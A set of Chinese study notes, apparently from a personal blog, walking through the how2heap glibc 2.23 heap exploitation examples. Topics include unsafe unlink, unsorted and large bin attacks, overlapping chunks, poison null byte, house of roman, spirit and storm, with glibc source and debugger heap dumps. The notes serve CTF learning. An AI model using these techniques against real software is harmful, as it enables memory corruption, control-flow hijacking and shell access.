how2heap 深入学习(5)

发表于 2023-02-28 更新于 2023-03-01 分类于学习笔记， glibc 系列
本文字数： 3.3k 阅读时长 ≈ 3 分钟

how2heap下载网址: 传送门
Glibc源码查看网址：传送门
参考书籍：CTF竞赛权威指南-pwn篇

测试环境：Ubuntu 16.04
Glibc版本：Ubuntu GLIBC 2.23-0ubuntu11.3

按照顺序，本文分析glibc 2_23文件夹中的第17~19个源码，这也是glibc 2.23 how2heap给出的最后3个源码。
如果本文的分析有任何错漏之处，还请各位读者不吝赐教，不胜感激。

17. unsafe_unlink

众所周知，unlink是一种常用的堆漏洞利用方式，最为常见的利用场景是可以进行unlink而且堆指针保存在全局变量中。（例题：XCTF攻防世界-Noleak）

这种漏洞利用方式不是借助于fastbin完成，因此需要申请较大的堆块。在源码中定义了一个全局变量chunk0_ptr，为其分配了一个大小为0x90的堆块。之后又分配了一个0x90堆块chunk1_ptr，这也是接下来被攻击的chunk。设第一个chunk的起始地址为x，全局变量的地址为y，现在的内存情况如下：

addr	+0x0	+0x8
x	-	(size) 0x91
…	…	…
x + 0x90	-	(size) 0x91
…	…	…
y	x	-

接下来，我们需要在chunk0_ptr的chunk中伪造一个chunk，为接下来的unlink做准备。伪造后的堆区长这样：

addr	+0x0	+0x8
x	-	(size) 0x91
x+0x10	-	-
x+0x20	(fake chunk fd) y-0x18	(fake chunk bk) y-0x10
…	…	…
x+0x90	(fake prev size) 0x80	(size) 0x90
…	…	…

注意：这里将第二个chunk的prev_in_use位修改为了0，fake prev size就是假chunk的大小，将fake prev size设为0x80是为了让后面一个chunk能够通过prev chunk找到我们构造的假chunk。fake chunk的假fd和bk指针的构造很重要，后面会用到。

接下来，我们将第二个chunk释放，释放时第二个chunk会和第一个chunk里面的假chunk合并。这样就造成了堆块的重叠。

下面解释一下为什么这之后能够进行任一地址写。

为什么要设置fd=y-0x18，bk=y-0x10？

这是为了绕过libc的检查。

#define unlink(AV, P, BK, FD) {                                            \
    FD = P->fd;								      \
    BK = P->bk;								      \
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
      malloc_printerr (check_action, "corrupted double-linked list", P, AV);  \
    else {								      \
        FD->bk = BK;							      \
        BK->fd = FD;							      \
        if (!in_smallbin_range (P->size)				      \
            && __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
	    if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)	      \
		|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
	      malloc_printerr (check_action,				      \
			       "corrupted double-linked list (not small)",    \
			       P, AV);					      \
            if (FD->fd_nextsize == NULL) {				      \
                if (P->fd_nextsize == P)				      \
                  FD->fd_nextsize = FD->bk_nextsize = FD;		      \
                else {							      \
                    FD->fd_nextsize = P->fd_nextsize;			      \
                    FD->bk_nextsize = P->bk_nextsize;			      \
                    P->fd_nextsize->bk_nextsize = FD;			      \
                    P->bk_nextsize->fd_nextsize = FD;			      \
                  }							      \
              } else {							      \
                P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
                P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
              }								      \
          }								      \
      }									      \
}

在unlink的源码中有一个检查是：__builtin_expect (FD->bk != P || BK->fd != P, 0)。因此需要保证此chunk的fd的bk等于bk的fd等于此chunk。由于C语言按照偏移获取结构体的成员，fd的偏移为0x10，bk的偏移为0x18。在全局变量中保存的就是第一个chunk，将fd指向y-0x18，那么fd->bk就为y；将bk指向y-0x10，那么bk->fd就为y。y中保存的正好就是x，这也就成功绕过了检查。检查通过之后，heap会进行堆块的合并操作，同时修改全局变量指针的值。

因为P = x，FD = y - 0x18，BK = y - 0x10，在语句BK->fd = FD;执行之后，全局变量的chunk0_ptr的值就变成了y-0x18。这样，我们就可以通过chunk0_ptr对其本身进行修改，此时可将chunk0_ptr的值修改为任意值。注意：不要被绕晕了，这个时候，全局变量保存的不再是第一个chunk的起始地址，而是通过unlink操作被修改了，但是libc误认为这里仍然保存的是一个chunk的指针，因此可以让这个全局变量自己修改自己。在源码中，将这里修改到了栈区，之后再次使用这个指针就可以修改栈区的内容了。

18. unsorted_bin_attack

这种攻击方式实际上在前面已经提到过，比较简单。将第一个unsorted bin chunk的bk指针修改为我们想要写的地址附近，然后把这个chunk分配回去就能够让unsorted bin head指向我们想要的地址，然后再调用malloc函数就能分配一块内存到我们想要的地址了。

19. unsorted_bin_into_stack

也是unsorted bin attack。首先分配两个0x110的chunk，后一个防止top chunk影响。然后释放第一个chunk。接下来在堆块中伪造一个chunk，设置size为0x110，bk为这个假堆块头。接下来是漏洞关键操作：修改第一个chunk的size和bk。程序将第一个chunk的size改小为0x20，bk改为假chunk。将size改小是为了后面分配0x100大小的堆块时能够跳过这个堆块直接分配到栈上的假chunk。

后面调用malloc函数时，首先从unsorted bin中查找到了第一个chunk。但是因为这个chunk的大小被改小了，libc判定空间不足，就将这个chunk移到了small bins中。之后检查到了假chunk并将其返回。既然chunk已经分配到了栈上，那么就可以直接修改main函数的返回地址（如果有canary可能不能直接修改）并劫持控制流。

至此，how2heap glibc 2.23的所有源码已经分析完成。之后会进行glibc 2.27源码的分析。实际上glibc 2.23和2.27的最大区别就是tcache。其他方面区别不大，因此glibc 2.27的分析可能会短很多。实际上，在分析调试how2heap源码中，有很多地方仍然没有深入到原子操作去进行。待到我的水平再上一层时可能会来解决这一部分问题。但现在，所有给出的堆漏洞已经了解其利用方法，通过做题可以加深我们对漏洞利用方式的判断与应用。谢谢。

how2heap 深入学习(4)

发表于 2023-02-28 更新于 2023-03-01 分类于学习笔记， glibc 系列
本文字数： 6.6k 阅读时长 ≈ 6 分钟

how2heap下载网址: 传送门
Glibc源码查看网址：传送门
参考书籍：CTF竞赛权威指南-pwn篇

测试环境：Ubuntu 16.04
Glibc版本：Ubuntu GLIBC 2.23-0ubuntu11.3

本人在前几天成功进入校队，因此后面的更新应该短时间内不会中断。
按照顺序，本文分析glibc 2_23文件夹中的第12~16个源码
如果本文的分析有任何错漏之处，还请各位读者不吝赐教，不胜感激。

12. large_bin_attack

large_bin_attack可以用于在栈区写入一个较大的值。通常是为其他攻击方式做准备。

首先，源码在栈区定义了两个变量stack_var1和stack_var2，类型为unsigned long。之后依次分配了大小为0x430(p1), 0x20, 0x510(p2), 0x20, 0x510(p3), 0x20大小的chunk。（0x20的chunk用于防止堆块合并）

之后，释放p1和p2。此时unsorted bin的结构应为：

unsorted bin head <-> p2 <-> p1

然后，malloc一个0xa0大小的chunk，在此过程中，p2被转移到了large bins中，p1被切割，仍在unsorted bin中且为last_remainder。

之后，释放p3。下面是释放p3之后的堆结构。

Allocated chunk | PREV_INUSE
Addr: 0x603000
Size: 0xa1

Free chunk (unsortedbin) | PREV_INUSE
Addr: 0x6030a0
Size: 0x391
fd: 0x7ffff7dd1b78
bk: 0x6039a0

Allocated chunk
Addr: 0x603430
Size: 0x30

Free chunk (largebins) | PREV_INUSE
Addr: 0x603460
Size: 0x511
fd: 0x7ffff7dd1fa8
bk: 0x7ffff7dd1fa8
fd_nextsize: 0x603460
bk_nextsize: 0x603460

Allocated chunk
Addr: 0x603970
Size: 0x30

Free chunk (unsortedbin) | PREV_INUSE
Addr: 0x6039a0
Size: 0x511
fd: 0x6030a0
bk: 0x7ffff7dd1b78

Allocated chunk
Addr: 0x603eb0
Size: 0x30

Top chunk | PREV_INUSE
Addr: 0x603ee0
Size: 0x20121

fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x6039a0 —▸ 0x6030a0 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x6039a0
smallbins
empty
largebins
0x500: 0x603460 —▸ 0x7ffff7dd1fa8 (main_arena+1160) ◂— 0x603460 /* '`4`' */

之后是漏洞部分。如果我们可以修改p2的控制字段。那么下面如此操作：

将p2的size从0x511改小为0x3f1，fd和fd_nextsize改为0，bk改为(unsigned long)(&stack_var1-2)，bk_nextsize改为(unsigned long)(&stack_var2-4)，调试时stack_var1的地址为0x7fffffffe470，stack_var2的地址为0x7fffffffe478。那么(unsigned long)(&stack_var1-2)的值就为0x7fffffffe460，(unsigned long)(&stack_var2-4)的值就为0x7fffffffe458。

修改之后，堆结构如下：

Allocated chunk | PREV_INUSE
Addr: 0x603000
Size: 0xa1

Free chunk (unsortedbin) | PREV_INUSE
Addr: 0x6030a0
Size: 0x391
fd: 0x7ffff7dd1b78
bk: 0x6039a0

Allocated chunk
Addr: 0x603430
Size: 0x30

Allocated chunk | PREV_INUSE
Addr: 0x603460
Size: 0x3f1

Allocated chunk
Addr: 0x603850
Size: 0x00

fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x6039a0 —▸ 0x6030a0 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x6039a0
smallbins
empty
largebins
0x500 [corrupted]
FD: 0x603460 ◂— 0x0
BK: 0x603460 —▸ 0x7fffffffe460 ◂— 0x0

最后，malloc大小为0xa0的chunk，然后我们就会惊奇地发现两个栈变量的值被修改为p3的地址。

这个漏洞的利用流程就是这样，而利用的关键就是_int_malloc函数中关于large bins的处理部分。

[...]

             else
             {
                 victim->fd_nextsize = fwd;
                 victim->bk_nextsize = fwd->bk_nextsize;
                 fwd->bk_nextsize = victim;
                 victim->bk_nextsize->fd_nextsize = victim;
             }
             bck = fwd->bk;

   [...]

   mark_bin (av, victim_index);
   victim->bk = bck;
   victim->fd = fwd;
   fwd->bk = victim;
   bck->fd = victim;

由于在修改p2之后，bin的结构如图：

所以遍历时会首先遍历到p1。通过源码进行调试发现这里直接跳过了else语句而从mark_bin开始执行。victim = p1，bck = fwd = main_arena + 984，这应该是p1现在的大小所对应的应该放入的small bin的位置（此时p1大小为0x391，属于small bins范围）。经历这4步之后，p1被成功链入到一个large bin中，目前一切正常。

然后，_int_malloc会进行下一次循环，去处理p3。此时victim = p3，fwd = p2，bck = 0x7fffffffe460。这时，else语句中会被执行。内部4个语句执行完成后，p1，p2，p3和部分栈区结构如下：

addr	+0x0	+0x8
p1	0	0x391
p1 + 0x10	<small bin addr>	<small bin addr>
…	…	…
p2	0	0x3f1
p2 + 0x10	0	0x7fffffffe460
p2 + 0x20	0	<p3>（原为0x7fffffffe458，第三步修改）
…	…	…
p3	0	0x511
p3 + 0x10	<unsorted bin head>	<unsorted bin head>
p3 + 0x20	<p2>（第一步修改）	0x7fffffffe458（第二步修改）
…	…	…
(stack)	stack_var1 = 0	stack_var2 = <p3>（第四步修改）

可以看到，在else语句里面，stack_var2在第4步被修改。跳出else语句之后，第四条语句bck->fd = victim;将stack_var1成功修改为p3的地址。至此，目标地址修改完成。stack_var1和stack_var2现在的值为p3的地址。

13. mmap_overlapping_chunks

源码中第一句就说，这是一个应该能够在所有libc版本中利用的漏洞。

在libc中，如果用户一次性申请的内存空间过大，malloc函数不会像通常那样从堆中分配内存给用户，而是调用mmap函数为用户映射一块单独的虚拟内存使用。同样，当用户将这块空间释放时，会调用munmap函数将这块空间返还给操作系统内核。

通过mmap获取的chunk在size域的bit-1上有体现。size的bit-0，bit-1，bit-2三位是用于保存控制信息的，其中bit-1就表示该chunk是否由mmap产生。mmap chunk有prev size域，它表示mmap chunk的剩余大小（内核调用mmap函数时通常会分配一块大于用户需求的内存块）。同时mmap chunk的fd和bk指针没有意义，在free时也不会放入bins中。在释放时，mmap chunk必须是页对齐的。

首先，程序分配一个小chunk用于初始化堆空间。然后分配一块大小为0x100000的chunk，这第一块chunk的位置是在libc的加载地址之上的，后面又分配了2个相同大小的大chunk就在libc的加载地址之下了，空间分配大致如下表：

addr	content
(high address)	first mmap chunk
	libc
	second mmap chunk
(low address)	third mmap chunk

此时，第三个mmap chunk的prev size为0，因为申请大小本身就是页对齐的，没有剩余空间。程序输出显示，第三个mmap chunk的size为0x101002。然后，我们只需要将这个chunk的大小改大，在释放的时候就能够将第二个mmap连带着释放掉。在程序中是将第三个chunk的size改为了0x202002，正好将第二个chunk全部覆盖。这实际上就是mmap版本的UAF。但是需要注意的是，由于munmap是将这块空间直接返还给了linux内核，因此释放后直接访问这段内存会导致程序崩溃。这点与一般的free不同。因此，现在需要做的就是将这段内存要回来，让两个指针指向相同位置。

随后，第三个chunk被释放，第二个连带着被释放，接下来又分配一个大小为0x300000的chunk，这个chunk完全覆盖了第二个和第三个chunk，大小为0x301002。此时第四个chunk的初始地址比第二个chunk小0x200000，由于所有mmap chunk的类型均设定为long long，因此索引应该为0x40000，即第四个chunk下标为0x40000的地方就是第二个chunk的开头，这样就能够通过第四个chunk修改第二个chunk的值了。

实际上这个漏洞还是比较好理解的，就是修改chunk的大小让chunk重叠。

14. overlapping_chunks

这是一个堆块重叠产生的漏洞利用。

首先有4个指针p1~p4，前三个分别分配0x100，0x100，0x80大小的chunk，然后将p1中的所有字节设为1，p2所有字节设为2，p3所有字节设为3。

然后将p2释放，p2会链入unsorted bin中。接下来是漏洞关键步骤：修改p2的大小，将其改大为0x180，这样p3将完全被p2重叠。之后，分配0x178大小的chunk到p4，这使得p2被重新分配出来，直接从unsorted bin中弹出。后面的过程就很好理解了，由于p4完全包含p3，这使得我们可以在p4中写入数据时随意修改p3中的值。

当然，从这里看，堆块重叠只是为其他漏洞利用方式做准备。

15. overlapping_chunks_2

这个文件与上面的overlapping_chunks基本上相似。

首先分配5个可用大小为1000的堆块，分别为p1~p5。之后释放p4，修改p2的大小使p2正好完全覆盖p3的同时保持其prev_in_use位为1。之后释放p2会将p3这块空间连带着释放掉，再将其分配回来到p6，就可以从p6里面写入数据随意修改p3的内容了。

利用方式与overlapping_chunks相同，不再赘述。

16. poison_null_byte

这是一种只溢出一个字节的漏洞利用方式。前面也分析过一个类似的漏洞house_of_einherjar。与house_of_einherjar相同。这种漏洞利用也是溢出一个空字符\x00。

程序首先将堆区构造成如下的结构（barrier防止top chunk的影响）：

addr	content
0x0	chunk a(size = 0x111)
…	…
0x110	chunk b(size = 0x211)
…	…
0x320	chunk c(size = 0x111)
…	…
0x430	barrier(size = 0x111)

然后，将b释放，进入关键步骤：从a溢出一个字节到b的size使b的size从0x211修改为0x200。这样b的实际大小就缩小了0x10。由于需要绕过检查，我们要在b的结尾处伪造一个prev size，这与house_of_einherjar类似，具体请参考我的how2heap第一篇笔记。

addr	content
0x0	chunk a(size = 0x111)
…	…
0x110	chunk b(size = 0x211)
…	…
0x310	fake prev_size = 0x200
0x318	0
0x320	chunk c(size = 0x111)
…	…
0x430	barrier(size = 0x111)

之后，分配一个大小为0x110的堆块，这个堆块的起始地址将和原b的起始地址相同，且分配之后会对假prev_size进行调整，调整为0xf0。然后继续分配一个0x90大小的空间p2，p2紧跟在p1之后。此时堆空间如图：

addr	content
0x0	chunk a(size = 0x111)
…	…
0x110	chunk b1(size = 0x111)
…	…
0x220	chunk b2(size = 0x91)
…	…
0x2b0	<unsorted bin chunk>(size = 0x61)
…	…
0x310	fake prev_size = 0x60
0x318	fake size = 0
0x320	chunk c(size = 0x111)
…	…
0x430	barrier(size = 0x111)

接下来，首先释放b1，然后紧接着释放c，此时会惊奇地发现，b1和c竟然合并了。

Allocated chunk | PREV_INUSE
Addr: 0x603000
Size: 0x111

Free chunk (unsortedbin) | PREV_INUSE
Addr: 0x603110
Size: 0x321
fd: 0x6032b0
bk: 0x7ffff7dd1b78

Allocated chunk
Addr: 0x603430
Size: 0x110

Top chunk | PREV_INUSE
Addr: 0x603540
Size: 0x20ac1

释放c时，_int_free检查到c的prev_size对应偏移处的chunk（b1）是一个unsorted bin free chunk，因此执行了malloc_consolidate函数将二者进行了合并，但是请注意，此时的p2仍然可以进行任意读写操作，这就导致了c完全覆盖了b2，接下来我们将c重新分配回去就可以通过向c写入数据以随意修改p2的内容。

理解该漏洞的核心是溢出一个字节的空字节究竟对堆空间有什么样的影响，溢出一个字节后，b的大小被改小，因此之后分配内存时，修改的prev size是一个假的prev size，下一个chunk真正的prev size不会被修改，这就为后面的堆块合并创造了条件，我们不需要修改后面一个chunk的prev size就能够让它与前面的堆块合并，造成堆块的重叠。

how2heap 深入学习(3)

发表于 2023-02-28 更新于 2023-03-02 分类于学习笔记， glibc 系列
本文字数： 9.4k 阅读时长 ≈ 9 分钟

how2heap下载网址: 传送门
Glibc源码查看网址：传送门
参考书籍：CTF竞赛权威指南-pwn篇

测试环境：Ubuntu 16.04
Glibc版本：Ubuntu GLIBC 2.23-0ubuntu11.3

前两周事情比较多，暂停了pwn的复习，今天继续。
按照顺序，本文分析glibc 2_23文件夹中的第9~11个源码。

9. house_of_roman

这是一种需要进行暴力猜解的漏洞，在开启PIE时仍然有效。我们来看下源码是如何操作的。

Step 1: 控制__malloc_hook

首先创建了4个chunk，大小分别为0x70, 0x90, 0x90, 0x70。

number	size	name
1	0x70	fastbin_victim
2	0x90	<anonymous>
3	0x90	main_arena_use
4	0x70	relative_offset_heap

之后将第3个chunk释放，其fd和bk指针将指向main_arena + 0x68的位置。

接下来再分配一个0x70大小的chunk(name: fake_libc_chunk)，分配后原先的unsorted bin会被分割一部分，剩下0x21大小仍为unsorted bin，而此时在fake_libc_chunk中已经有了main_arena + 0x68的地址了。

后面，依次释放relative_offset_heap和fastbin_victim。此时bins的结构为：

fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x555555757000 <fastbin_victim> —▸ 0x555555757190 <relative_offset_heap>◂— 0x0
0x80: 0x0
unsortedbin
all: 0x555555757170 <main_arena_use的一部分> —▸ 0x7ffff7bcdb78 (main_arena+88) ◂— 0x555555757170 /* 'pquUUU' */
smallbins
empty
largebins
empty

堆的结构为：

Free chunk (fastbins) | PREV_INUSE
Addr: 0x555555757000
Size: 0x71
fd: 0x555555757190

Allocated chunk | PREV_INUSE
Addr: 0x555555757070
Size: 0x91

Allocated chunk | PREV_INUSE
Addr: 0x555555757100
Size: 0x71

Free chunk (unsortedbin) | PREV_INUSE
Addr: 0x555555757170
Size: 0x21
fd: 0x7ffff7bcdb78
bk: 0x7ffff7bcdb78

Free chunk (fastbins)
Addr: 0x555555757190
Size: 0x70
fd: 0x00

之后，将第一个chunk的fd指针部分覆盖（覆盖最低1字节为0），那么此时第一个chunk指向的就是0x555555757100处，也就是刚分配的0x70空间的首部。此操作完成之后，堆结构变为：

Free chunk (fastbins) | PREV_INUSE
Addr: 0x555555757000
Size: 0x71
fd: 0x555555757100

Allocated chunk | PREV_INUSE
Addr: 0x555555757070
Size: 0x91

Free chunk (fastbins) | PREV_INUSE
Addr: 0x555555757100
Size: 0x71
fd: 0x7ffff7bcdbf8

Free chunk (unsortedbin) | PREV_INUSE
Addr: 0x555555757170
Size: 0x21
fd: 0x7ffff7bcdb78
bk: 0x7ffff7bcdb78

Allocated chunk
Addr: 0x555555757190
Size: 0x70

bins的结构为：

fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x555555757000 —▸ 0x555555757100 —▸ 0x7ffff7bcdbf8 (main_arena+216) ◂— 0x7ffff7bcdbf8
0x80: 0x0
unsortedbin
all: 0x555555757170 —▸ 0x7ffff7bcdb78 (main_arena+88) ◂— 0x555555757170 /* 'pquUUU' */
smallbins
empty
largebins
empty

之后，我们就可以将0x555555757100（此时实际上并不是freed chunk）的fd指针修改为malloc_hook - 0x23。但是由于开启了PIE，因此需要爆破4个比特位，即16选1。

注意：PIE会对地址进行随机化处理，但是一页之内的地址还是一样的，也就是说，开启和不开启PIE时地址的最低12bit是完全相同的。我们可以获取libc中malloc_hook的相对地址，其低12bit可以获得，但覆盖是整个字节覆盖，因此我们需要猜解随机化地址的倒数第2低字节中的高4位。

覆盖地址为0x555555757100的chunk的fd指针的低2字节，如果爆破成功，后面连续分配两个0x70大小chunk后再分配一个即将fastbin挟持到__malloc_hook。

这是__malloc_hook前面一部分内存空间的情况。

addr	+0	+1	+2	+3	+4	+5
0x7ffff7bcdae8	00	00	00	00	00	00
0x7ffff7bcdaf0(_IO_wide_data_0+304)	60	c2	bc	f7	ff	7f
0x7ffff7bcdaf8	00	00	00	00	00	00
0x7ffff7bcdb00(__memalign_hook)	a0	ee	88	f7	ff	7f
0x7ffff7bcdb08(__realloc_hook)	70	ea	88	f7	ff	7f
0x7ffff7bcdb10(__malloc_hook)	00	00	00	00	00	00

我们现在解释为什么要将地址挟持到__malloc_hook - 0x23处。

fastbin的重新分配会进行一个检查：后面一个fastbin的大小是否在fastbin可以容纳的chunk的大小范围之内。因此我们需要转移到一个这样一个地址，这个地址后面对应的size域有一个0x20~0x80的值。看到上面的表，我们想借用7f。如何借用？注意到0x7ffff7bcdaf5处有一个7f（这个7f一般是固定不变的），而且这之后有10个字节都是0，如果我们从这里开始读8个字节，那值就正好是0x7f，不会超过0x80。所以考虑将0x7ffff7bcdaed作为chunk的头部，这样读取到的size就可以通过检查。

Step 2: Unsorted bin attack

在第一步中，我们成功将fastbin挟持到了__malloc_hook处。但是由于libc的加载地址仍然未知，现在我们能做的仍然非常有限。因此下一步我们准备进行一次unsorted bin attack。

首先分配一个0x90大小的chunk(name: unsorted_bin_ptr)，之后分配一个0x30大小的chunk防止unsorted bin与top chunk合并。下面就是常规的unsorted bin attack流程：

释放unsorted_bin_ptr，利用UAF将其bk指针修改为__malloc_hook - 0x10（这里只需要修改最低2字节，而且这在第一步已经通过爆破获取）。然后将这个unsorted bin分配出来，这样main_arena + 0x68被修改为__malloc_hook - 0x10，同时__malloc_hook被修改为main_arena + 0x68（这是双向链表中元素脱链的标准操作，即要脱链的为chunk，则需将chunk->bk->fd指向main_arena + 0x68，main_arena + 0x68指向chunk->bk，图示如下）

Step 3: getshell

之后，我们需要利用挟持到__malloc_hook的chunk部分修改__malloc_hook的值。首先，我们在第一步已经通过爆破获取了__malloc_hook地址的低2字节，根据这低2字节，我们可以在libc中获取到system加载地址的低2字节。

例如，libc6_2.23-0ubuntu11.3_amd64版本中system地址为0x453a0，__malloc_hook地址为0x3c4b10。假如爆破成功时__malloc_hook加载地址的低2字节为0x8b10，那么说明加载地址等于相对地址加上(0x400 + n * 0x1000)。即system加载地址的低2字节应为0x93a0。

我们获取到system地址的低2字节后，需要爆破system地址第3小的字节。注意到0x3c4b10 - 0x453a0 = 0x37f770，system的地址和__malloc_hook的地址除低3字节外剩余部分很有可能相等。因此只对第3小的字节进行爆破即可。

随机猜解system地址如果成功，在之后进行malloc，参数可以填one_gadget，这样就可以成功获取shell。

综上所述，house_of_roman一共需要爆破12比特位，加上加载地址可能造成的影响，爆破成功的概率应该略低于 1 / 2^12，多试几次就可以getshell。

10. house_of_spirit

这是一种常用的堆漏洞，核心思想也很简单：在目标地址伪造一个chunk并引导libc将这块内存释放，下一次malloc即可分配到目标地址处。

这里需要注意的就是伪造堆块的方法。

重要：_int_free函数的fastbin检查：

检查堆块的size是否过大到不切实际
检查chunk是否对齐（x64的chunk头必须是0x8对齐的，即最低4bit只能为0或8）

上述两种检查如果没有通过，直接报错中止，源码如下：

size = chunksize (p);
if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
      || __builtin_expect (misaligned_chunk (p), 0))
    {
      errstr = "free(): invalid pointer";
    errout:
      if (!have_lock && locked)
        (void) mutex_unlock (&av->mutex);
      malloc_printerr (check_action, errstr, chunk2mem (p), av);
      return;
    }

检查size是否过小以及size是否对齐，即size不能小于0x20且在x64中也要是0x8对齐，否则报错中止。源码如下：

if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
    {
      errstr = "free(): invalid size";
      goto errout;
    }

检查下一个chunk的大小，不能小于2 * SIZE_SZ（即0x10），也不能大于av->system_mem（应该是一个很大的值），源码如下：

if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
			     >= av->system_mem, 0))
      {
	/* We might not have a lock at this point and concurrent modifications
	   of system_mem might have let to a false positive.  Redo the test
	   after getting the lock.  */
	if (have_lock
	    || ({ assert (locked == 0);
		  mutex_lock(&av->mutex);
		  locked = 1;
		  chunk_at_offset (p, size)->size <= 2 * SIZE_SZ
		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem;
	      }))
	  {
	    errstr = "free(): invalid next size (fast)";
	    goto errout;
	  }
	if (! have_lock)
	  {
	    (void)mutex_unlock(&av->mutex);
	    locked = 0;
	  }
      }

检查fastbin的第一个chunk是否是当前释放的chunk，防止double free。源码如下：

fb = &fastbin (av, idx);

    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
    mchunkptr old = *fb, old2;
    unsigned int old_idx = ~0u;
    do
      {
	/* Check that the top of the bin is not the record we are going to add
	   (i.e., double free).  */
	if (__builtin_expect (old == p, 0))
	  {
	    errstr = "double free or corruption (fasttop)";
	    goto errout;
	  }
	/* Check that size of fastbin chunk at the top is the same as
	   size of the chunk that we are adding.  We can dereference OLD
	   only if we have the lock, otherwise it might have already been
	   deallocated.  See use of OLD_IDX below for the actual check.  */
	if (have_lock && old != NULL)
	  old_idx = fastbin_index(chunksize(old));
	p->fd = old2 = old;
      }
    while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);

在house_of_spirit中，第2个检查一般都是满足的，绕过第1个检查需要将目标地址看做一个chunk，对应size的地址处应该写入一个0x20~0x80且能够被0x8整除的数，以绕过第1, 3个检查。第4个检查的绕过需要一些小技巧。假设在目标地址处我们可以控制0x60的空间，那么我们的size不应该写成0x60而是小于0x60，这样方便我们在后面伪造next chunk的size。第5个检查一般没有问题。

所有这些工作做好之后，就可以先释放再分配了。分配完成后就可以在目标地址处获取一个chunk。一般来说house_of_spirit是作为跳板来使用的，在目标地址获取chunk能够很好地为其他攻击手段做准备。

11. house_of_storm

关于此利用方式，源码中的说明是可以向用户返回任意一个chunk。

首先，程序分配了两个chunk，一个进入unsorted bin，一个进入large bins，且unsorted bin中的chunk大小大于large bins中的chunk。在源码中，unsorted bin chunk的大小设定为0x4f0，同时分配一个小chunk防止其在释放时与top chunk合并。

之后，源码中以这个chunk的最高非0字节为参考，计算了需要分配的chunk的大小。将最低1bit置0（因为这里在chunk的size中代表的是prev_in_use标志位），这里需要进行检查：最低1字节的bit-3不能为1，若bit-2为1则bit-1不能为0，至于原因，后面会提到。

如果上述检查通过，则进行接下来的操作。分配一个大小为0x4e0的chunk，再加上一个小chunk防止与top chunk合并。之后释放0x4e0大小的chunk和0x4f0大小的chunk（这里注意要首先释放较小的chunk），然后分配一个0x4f0大小的chunk。这样由于unsorted bin在malloc时遵循先进先出的队列结构，会首先检查到小chunk，而小chunk大小不足，会被链入到large bins中。然后再将0x4f0大小的chunk释放，返还到unsorted bin中，bins的环境就构造完成了。

fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x603000 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x603000
smallbins
empty
largebins
0x4c0: 0x603510 —▸ 0x7ffff7dd1f98 (main_arena+1144) ◂— 0x603510

然后，我们需要使用unsorted bin attack，覆盖unsorted bin chunk的bk指针为(目标地址 - 0x10)处，覆盖large bin chunk的bk指针到(目标地址 - 0x8)处，覆盖large bin chunk的bk_nextsize。之后，malloc即可获取目标地址的chunk。

但是，为什么会这样呢？这需要从_int_malloc函数中寻找答案。

本漏洞利用中_int_malloc函数中重要步骤：

参考博客（有分析全过程）：_int_malloc函数详解

如果申请大小在fastbin范围则从fastbin中查找是否有合适的chunk。
如果申请大小在small bins范围则从small bins中查找是否有合适的chunk。
前2步没有找到调用malloc_consolidate函数整理堆块
大循环：

(1) 从unsorted bin中获取当前遍历到的chunk
(2) 如果申请大小在small bins范围且last remainder可以切割一部分给申请堆块，则切割后返回
(3) 如果申请大小正好等于当前遍历到chunk的大小，则直接返回

(4) 将当前unsorted bin chunk放入small bins或large bins中：
如果当前遍历到的unsorted bin chunk的大小属于small bins范围则放入对应的small bin中。
如果属于large bins范围，则需要进行一些处理：
因为large bins中的每一个bin里面的chunk大小均是一个范围值而不是固定值，所以libc会对每一个large bin中的chunk按照大小进行排序，large bin chunk的fd和bk指针指向前后chunk，而fd_nextsize和bk_nextsize指向前后第一个与该chunk大小不同的chunk，便于遍历。所以，libc会遍历该large bin并将这个原本在unsorted bin中的chunk放入正确的位置。在house of storm中，至关重要的就是下面的入链操作：

victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;

这里要尤其注意第4条语句，这是唯一一条修改目标地址值的语句。
（victim = unsorted bin chunk，fwd = large bin chunk）

在此之前，分别位于unsorted bin和large bins的两个chunk的构造如下：

unsorted bin chunk:

addr	+0x0	+0x8
0x603000	0	0x4f1(size)
0x603010	main_arena + 0x68	target-0x10
0x603020	0	0

large bin chunk:

addr	+0x0	+0x8
0x603510	0	0x4e1(size)
0x603520	main_arena + 1144	target-0x8
0x603530	0x603510(fd_nextsize)	target-0x2a(bk_nextsize)

在执行完上述4步之后，结构变为：

unsorted bin chunk:

addr	+0x0	+0x8
0x603000	0	0x4f1(size)
0x603010	main_arena + 0x68	target-0x8
0x603020	0x603510	target-0x2a

large bin chunk:

addr	+0x0	+0x8
0x603510	0	0x4e1(size)
0x603520	main_arena + 1144	target-0x8
0x603530	0x603510	0x603000

同时(target-0x2a)->fd_nextsize被写入为0x603000，也即target-0xa处被写入为0x603000：

addr	0	1	2	3	4	5	6	7
target-0x10	–	–	–	–	–	–	00	30
target-0x8	60	00	00	00	00	00	00	00
target
target+0x8

